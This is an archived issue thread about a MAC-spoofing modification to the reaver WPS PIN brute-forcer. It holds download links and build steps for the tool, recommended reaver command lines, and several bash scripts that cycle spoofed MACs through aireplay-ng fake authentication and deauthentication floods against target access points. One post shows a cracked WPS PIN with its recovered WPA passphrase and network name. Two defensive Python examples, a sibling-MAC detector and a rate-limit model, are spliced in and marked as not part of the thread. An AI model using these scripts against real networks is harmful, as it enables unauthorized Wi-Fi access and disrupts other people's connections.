Open GoogleCodeExporter opened 9 years ago
Would be a nice improvement - every pin/different mac.
Original comment by music.an...@gmail.com
on 2 Mar 2012 at 7:04
Great! Can you share your modified source code Bob?
Original comment by itmanvn
on 3 Mar 2012 at 2:29
Yes, of course.
Reaver WPS 1.4 with MAC Changer - LINK -
http://www.4shared.com/archive/AHxJ4rDm/reaver-14-mac-changertar.html
Example of use:
reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
or
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
What I recommend:
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
To associate more effectively, I recommend using the aireplay-ng tool. Create an
"associate.sh" file, and put this inside:
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZF &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZE &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZD &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZC &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZB &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:ZA &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z9 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z8 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z7 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z6 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z5 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z4 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z3 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z2 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z1 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h
ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &
PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC
(without the last digit).
Before using reaver tool, just type "sh associate.sh". To kill all the
aireplay-ng, type "killall aireplay-ng".
If you have success using this method, please, share with us to improve more
and more the reaver WPS.
Thanks,
Bob
Original comment by gabrielr...@gmail.com
on 5 Mar 2012 at 3:11
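The station pattern in the comment above (sixteen client MACs that differ only in the last hex digit, all authenticating to one BSSID) is visible from the AP or WIDS side. The following is an added example, not part of the original thread or of reaver: a detector over a constructed log format, where the line layout, the thresholds and every address are assumptions.

```python
import re
from collections import defaultdict

# Constructed log format (an assumption, not any real AP's output):
#   <epoch-seconds> <AUTH|EAPOL_START> bssid=<mac> sta=<mac>
MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
LINE_RE = re.compile(
    rf"^(?P<ts>\d+) (?P<event>AUTH|EAPOL_START) bssid=(?P<bssid>{MAC}) sta=(?P<sta>{MAC})$",
    re.IGNORECASE,
)

# Constructed sample: five "sibling" stations plus two unrelated clients.
SAMPLE_LOG = """\
1000 AUTH bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a0
1002 EAPOL_START bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a0
1010 AUTH bssid=02:aa:bb:cc:dd:01 sta=3c:11:22:33:44:55
1030 AUTH bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a1
1033 EAPOL_START bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a1
1060 AUTH bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a2
1090 AUTH bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a3
1095 AUTH bssid=02:aa:bb:cc:dd:01 sta=7e:de:ad:be:ef:10
1120 AUTH bssid=02:aa:bb:cc:dd:01 sta=02:00:00:00:00:a4
garbage line that the parser skips
""".splitlines()


def parse(lines):
    """Yield (ts, event, bssid, sta) tuples; lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m["ts"]), m["event"].upper(), m["bssid"].lower(), m["sta"].lower()


def sibling_clusters(events, window=300, min_siblings=4):
    """Flag groups of stations that share the first 11 hex digits of their MAC
    and contact the same BSSID within `window` seconds.

    Returns {(bssid, mac_prefix): largest number of siblings seen at once}.
    """
    seen = defaultdict(dict)  # (bssid, prefix) -> {sta: last_seen_ts}
    alerts = {}
    for ts, _event, bssid, sta in sorted(events):
        key = (bssid, sta[:-1])  # drop the last hex digit
        stations = seen[key]
        stations[sta] = ts
        # Forget siblings that have been silent for longer than the window.
        for old in [s for s, t in stations.items() if ts - t > window]:
            del stations[old]
        if len(stations) >= min_siblings:
            alerts[key] = max(alerts.get(key, 0), len(stations))
    return alerts


if __name__ == "__main__":
    for (bssid, prefix), count in sibling_clusters(parse(SAMPLE_LOG)).items():
        print(f"ALERT bssid={bssid} prefix={prefix}? siblings={count}")
```

Batches of same-vendor devices can have adjacent addresses, so tune `min_siblings` against normal traffic before alerting on it.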
I still don't understand. Like the author said. The wifi usually doesn't block
your MAC address, it does not have the mac address table. I mean for regular
wifi. But what it is, is it lock WPS instead...Please someone clarify on this
Original comment by ryanl33x...@ymail.com
on 5 Mar 2012 at 5:17
Well, I don't know why or how the AP rejects the "EAPOL Request", but, with the
method I suggested, I retrieved the PIN from some APs with a better speed than
the normal. My intention from sharing the code is to allow other people to try
with other APs and confirm if this method works or not.
In my case, when reaver got a successful pin try, some APs reject the "EAPOL
Request" for some seconds, but only for the MAC that tried. It isn't a WPS
lock, because I can continue trying PINs. I got this behavior with TP-LINK and
D-Link APs.
Original comment by gabrielr...@gmail.com
on 5 Mar 2012 at 2:53
Hi Bob,
Tried your method but no luck, I use Alfa AWUS036H and AP is a Linksys
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
The only way that still works with this AP is:
1. aireplay-ng -1 10 -a 00:23:69:XX:XX:XX -e Hitech mon3 --ignore-negative-one
2. reaver -A -b 00:23:69:XX:XX:XX -c 6 -vv -i mon3 --dh-small --no-nacks --ignore-locks --win7 -d 25
But this is too slow :(
Original comment by itmanvn
on 5 Mar 2012 at 4:08
Hello,
ryanl33x1511: I found the answer! Some APs deauthenticate the client that tried
a pin. With the MAC Changer method, when one MAC is deauthenticated (and
aireplay-ng takes time to authenticate), another is trying a new pin.
itmanvn: Are you using aireplay-ng to authenticate all the MACs? Like the
associate.sh that I suggested. And you have to check if your wireless card
supports the injection of packets from MACs different from your original one.
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 8 Mar 2012 at 3:17
Hi Bob,
It was my mistake, I put the wrong AP's MAC :)). Just hacked a Dlink AP. The
Linksys still does not improve speed with mac-changer.
[+] 100.00% complete @ 2012-03-07 17:24:41 (8 seconds/pin)
[+] Pin cracked in 34667 seconds
[+] WPS PIN: '32456394'
[+] WPA PSK: 'vnxkthuy'
[+] AP SSID: 'VanHung_Network'
Anyway, with --mac-changer, reaver cannot crack the WPA PSK, it just shows the
WPS PIN. I have to remove --mac-changer and then use -pin to get the WPA PSK.
Original comment by itmanvn
on 8 Mar 2012 at 4:46
Hi,
It seems that using the --mac-changer method took me some time compared to the
normal -d 0 -t 1 method that I used.
--mac-changer: [+] 45.02% complete @ 2012-03-28 03:23:18 (39 seconds/pin)
-d 0 -t 1: [+] 45.06% complete @ 2012-03-28 03:24:40 (1 seconds/pin)
But it seems that the aireplay arguments helped.
Just my 1c.
Original comment by syakir
on 27 Mar 2012 at 7:25
Is there any chance you could reupload the reaver 1.4 with mac changer, as
the link seems to be dead?
Original comment by mighty-s...@hotmail.co.uk
on 8 Apr 2012 at 9:05
Hi mighty,
The 4shared link is working, but I uploaded to hotfile for you:
https://hotfile.com/dl/152186405/f53e87e/reaver-1.4-mac-changer.tar.gz.html
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 9 Apr 2012 at 2:27
I get "The file link that you requested is not valid." on 4shared. Also, I just
downloaded the hotfile one and it says it's corrupt.
Original comment by mighty-s...@hotmail.co.uk
on 9 Apr 2012 at 5:47
Never mind, redownloaded and all working fine, thank you.
Original comment by mighty-s...@hotmail.co.uk
on 9 Apr 2012 at 5:54
[deleted comment]
I'm running bt5r2 x86 desktop, updated, using the modified reaver 1.4 with mac
changer.
OK, this was tricky for me with wusb600n v2 (RT3572):
you still have to use the "-m" option along with the NEW "-M".
The -m needs to be the same as what is set with 'ifconfig wlan0 hw ether'. For me
everything is working well with the mac changer addon.
Thanks
Original comment by tdbo...@gmail.com
on 29 Apr 2012 at 5:05
Hello,
Thank you "tdbone1" for sharing your experience. You are right, to use another
MAC you need the "-m" option, sorry that I didn't specify it before.
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 30 Apr 2012 at 12:24
Would this help for "warning ap rate limiting"? If so, it would be nice to be
able to change mac when rate limiting does occur. The ap I'm experimenting with
accepts +-30 pins and then I have to wait 301 seconds before I can continue the
attack. I'll try reaver on a different machine/mac when the target ap is in
rate limiting (because of attack with machine 1).
peace
Original comment by kasperka...@gmail.com
on 9 Jun 2012 at 8:55
OK, I did the test and changing the mac address won't help if the ap is blocked
due to rate limiting.
peace
Original comment by kasperka...@gmail.com
on 9 Jun 2012 at 9:47
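The two AP behaviours reported in this thread, a short hold-off applied only to the MAC that tried a PIN and a lockout that applies regardless of MAC, are modelled side by side below to show why only the second one caps the attempt rate. This is an added example, not code from the thread or from any AP firmware; the 10-second hold-off and the station labels are assumptions, while 30 attempts and 301 seconds are the figures reported in the comment above.

```python
class PerStationHoldoff:
    """Refuses a station for `holdoff` seconds after each failed PIN attempt.

    The throttle is keyed on the client MAC, which the client chooses.
    """

    def __init__(self, holdoff):
        self.holdoff = holdoff
        self.blocked_until = {}  # sta -> time at which it is accepted again

    def allow(self, now, sta):
        return now >= self.blocked_until.get(sta, 0)

    def record_failure(self, now, sta):
        self.blocked_until[sta] = now + self.holdoff


class GlobalLockout:
    """Locks WPS for every station after `max_failures` failed attempts.

    The throttle is keyed on the registrar itself, so the client MAC is ignored.
    """

    def __init__(self, max_failures, lock_seconds):
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.failures = 0
        self.locked_until = 0

    def allow(self, now, sta):
        return now >= self.locked_until

    def record_failure(self, now, sta):
        self.failures += 1
        if self.failures >= self.max_failures:
            self.failures = 0
            self.locked_until = now + self.lock_seconds


def accepted_attempts(limiter, stations, duration, tick=1):
    """Count the failed PIN attempts a limiter lets through in `duration`
    seconds when at most one attempt per `tick` is made and any station in
    `stations` that the limiter currently accepts may be used."""
    accepted = 0
    now = 0
    while now < duration:
        for sta in stations:
            if limiter.allow(now, sta):
                limiter.record_failure(now, sta)
                accepted += 1
                break
        now += tick
    return accepted


def compare(duration=600):
    """Return accepted-attempt counts for one station versus sixteen."""
    one = ["sta-0"]                              # hypothetical labels
    many = [f"sta-{i:x}" for i in range(16)]
    return {
        "per_station_1": accepted_attempts(PerStationHoldoff(10), one, duration),
        "per_station_16": accepted_attempts(PerStationHoldoff(10), many, duration),
        "global_1": accepted_attempts(GlobalLockout(30, 301), one, duration),
        "global_16": accepted_attempts(GlobalLockout(30, 301), many, duration),
    }


if __name__ == "__main__":
    for name, count in compare().items():
        print(f"{name:>15}: {count} attempts accepted in 600 s")
```

A throttle keyed on the station address scales with the number of addresses in use, while the lockout keyed on the registrar gives the same count either way, which matches the test result reported in the comment above.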
I suggest you read the Musket Team 361 entry concerning MAC codes and reaver.
There are numerous comments on the web concerning reaver locked on the first
pin and going nowhere. The 361 comments solve this, but since this deals with
mac codes we thought you might be interested. We have ONLY been playing with
this attack for 48 hours so we were focused on just getting the program to give
us a result. Your variable mac code approach though is intriguing. We are so
new to this program that we do not want to comment further. We were going to
try mac spoofing an associated client to see how this increased the results.
Maybe you will get there before us.
Bring What Is Hidden Into View
Musket Team A (a group of hackers and remote viewers)
Original comment by muske...@yahoo.com
on 30 Jul 2012 at 4:13
#!/bin/bash
# !!!!! Script runs in continuous loop. TO STOP THIS SCRIPT open a new terminal window and type killall aireplay-ng !!!!
# Script designed to be run during a reaver attack
# For historical reference previous scripts sending variable macs seemed to flood the router with association requests
# slowing down the router's ability to respond during a reaver attack
# This script allows the user to set transmission rates and only send one(1) mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type variablemacs.sh in a terminal window.
# This script file sends a constantly changing MAC Code to the target AP during
# a reaver attack. You can alter the time, transmission rate and seconds to reauth by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as reaver then run variablemacs.sh
#
# Before you start the program
# Change Target MAC variable within "" to your Target AP and then save the variablemacs.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48" = Arouter, 00:26:75:3E:DD:6C = Brouter
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the program logic
# MON="mon0" Can be changed if your virtual monitor is different
# TIME="120" #Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m" # Time process active 30s 1m 2m etc
# The # = REM or remarks or comments. The Computer ignores this
#######################################################################
# Below are the script variables
#
TARGET="00:26:75:3E:DD:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5" # Do not change unless you understand the coding logic
MON="mon0" # Do not change this unless your virtual monitor is not designated as mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m" # Time process active 30s 1m 2m etc
# Note below the 00:11:22:33:44:55 mac has been turned off as it is the same mac we are using with reaver 1.4
#
for (( ; ;))
do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"4"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"4" --ignore-negative-one $MON & sleep $DELAY; kill $!
# echo X
# echo XXXXXXXXXXXXXXXXXXX
# echo STARTING $VARMAC"5"
# echo XXXXXXXXXXXXXXXXXXX
# Remarked out as this is the mac used by reaver
# aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"5" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"6"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"6" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"7"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"7" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"8"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"8" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"9"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"9" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"A"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"A" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"B"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"B" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"C"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"C" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"D"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"D" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"E"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"E" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"F"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"F" --ignore-negative-one $MON & sleep $DELAY; kill $!
done
Original comment by muske...@yahoo.com
on 31 Jul 2012 at 8:36
Hello Musket Team A,
Thank you for the script, it will be useful for everybody.
I used my method of attack during 2 months, and the results are very good. Some
people have talked about the rate limiting, but this attack is not to bypass
the rate limiting, this attack is to bypass the delay that the aireplay-ng
needs to re-authenticate a MAC that tried a PIN. While the aireplay-ng
re-authenticates the MAC, the reaver-wps is using another MAC to try another
PIN.
Please, tell us if you find another results and thank you again for the script.
Regards,
Bob
Original comment by gabrielr...@gmail.com
on 31 Jul 2012 at 7:49
We have found a small bug in the program. Once started the program runs
constantly in the background regardless of the killall aireplay-ng command. We
are still testing this approach. We are exploring spoofing an associated
client's mac and mixed short deauth signals embedded in this mac changing
program running continuously. When the signal is weak the router seems to get
confused and only a reaver program restart sometimes and/or a short deauth
burst like aireplay-ng -0 10 a. target AP mon0 seems to straighten things out
and get the program moving again.
Please note we are field testers working with these tools in the real world and are not trying to redo the fantastic work of the authors of reaver, whom we hold in high regard.
Musket Team Alpha
Original comment by muske...@yahoo.com
on 1 Aug 2012 at 1:00
#!/bin/bash
# Bash Script sends variable mac codes and embedded deauth to target
# Script designed to be run during a reaver attack
# !!!!! Script runs in a loop. TO STOP THIS SCRIPT open a new terminal window and type killall aireplay-ng !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception timeouts occur randomly during attack
# Many times a stalled reaver attack begins to function the moment the first deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1) mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type variablemacs01.sh in a terminal window.
# You can alter the time, transmission rate and seconds to reauth, number of deauths and number of loops by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as reaver then run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver etc.
#
#Setup before starting
# Change Target MAC variable within "" to your Target AP and then save the variablemacs01.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48"
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the program logic
# MON="mon0" Can be changed if your virtual monitor is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m" # Time process active 30s 1m 2m etc
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
#
#######################################################################
# Below are the script variables
#
TARGET="00:26:75:41:49:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5" # Do not change unless you understand the coding logic
MON="mon0" # Do not change this unless your virtual monitor is not designated as mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m" # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10 too short for the routers we attack
COUNT="25" # Number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
#
while [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo Value of count is: $COUNT
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done
Original comment by muske...@yahoo.com
on 1 Aug 2012 at 6:13
variablemac01.sh update
Allows users to run program and input mac code of target from terminal window.
#!/bin/bash
# Bash Script sends variable mac codes and embedded deauth to target
# Script designed to be run during a reaver attack
# !!!!! Script runs in a loop. TO STOP THIS SCRIPT open a new terminal window and type killall aireplay-ng !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception timeouts occur randomly during attack
# Many times a stalled reaver attack begins to function the moment the first deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1) mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type variablemacs01.sh in a terminal window.
# You can alter the time, transmission rate and seconds to reauth, number of deauths and number of loops by changing the variable
# You can run wash then reaver and open airodump-ng on the same channel as reaver then run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver etc.
#
#
######################################################################
# TARGET="00:1F:5B:8A:47:48" Note entered by keyboard commands
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the program logic
# MON="mon0" Can be changed if your virtual monitor is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m" # Time process active 30s 1m 2m etc
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
#
#######################################################################
# Below are the script variables
# Keyboard Entry Target AP MAC Entry
#
while true
do
echo ''
echo ' Bash Script sends variable mac codes and embedded deauth to target'
echo ' Script designed to be run during a reaver attack'
echo ' Other variables such as number of loops must be set in script file'
echo ' =================================================================='
echo ''
echo ' !!!!!Before continuing complete the following!!!!!'
echo ''
echo ' STOP wash and START reaver on the appropriate channel'
echo ' of Target AP in a separate terminal window'
echo ''
echo ' Start airodump-ng in seperate terminal window'
echo ''
echo ' Example = airodump-ng -c channel of target AP mon0'
echo ''
echo ' !!Channel in reaver must equal = channel in airodump-ng!!'
echo ' !!or reaver will fail!!'
echo ' ========================'
echo ''
echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"
read CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
n|N|no|NO|No)
echo Aborting - you entered $CONFIRM
exit
;;
esac
done
echo You entered $CONFIRM. Continuing ...
while true
do
echo ''
echo ''
echo ''
echo -n "Enter your targets mac code >"
read TARGET
echo "You entered: $TARGET"
echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"
echo ''
read CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
n|N|no|NO|No)
echo Aborting - you entered $CONFIRM
exit
;;
esac
done
echo You entered $CONFIRM. Continuing ...
#TARGET="20:AA:4B:A7:FD:87" # Change the mac code to your target entered by keyboard commands!!!!!!!!
VARMAC="00:11:22:33:44:5" # Do not change unless you understand the coding logic
MON="mon0" # Do not change this unless your virtual monitor is not designated as mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m" # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10 too short for the routers we attack
COUNT="100" # Number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
#
while [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXX
echo Number of loops remaining =: $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done
Original comment by muske...@yahoo.com
on 7 Aug 2012 at 7:29
[deleted comment]
upload to mediafire
http://www.mediafire.com/?sptpfv9kgnof0nr
Original comment by rasimc...@gmail.com
on 2 Jul 2013 at 7:54
Can you help with installation?
Original comment by rasimc...@gmail.com
on 2 Jul 2013 at 7:58
Extract the tarball
tar -xzvf reaver-1.4-mac-changer.tar.gz
Install Required Libraries and Tools
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Build Reaver
cd reaver-1.4-mac-changer
cd src
./configure
make
Install Reaver
sudo make install
Original comment by gabrielr...@gmail.com
on 2 Jul 2013 at 5:01
thanks
Original comment by rasimc...@gmail.com
on 4 Jul 2013 at 6:58
[deleted comment]
[deleted comment]
[deleted comment]
[deleted comment]
[deleted comment]
Now you can grab the code via Github:
https://github.com/gabrielrcouto/reaver-wps
Original comment by gabrielr...@gmail.com
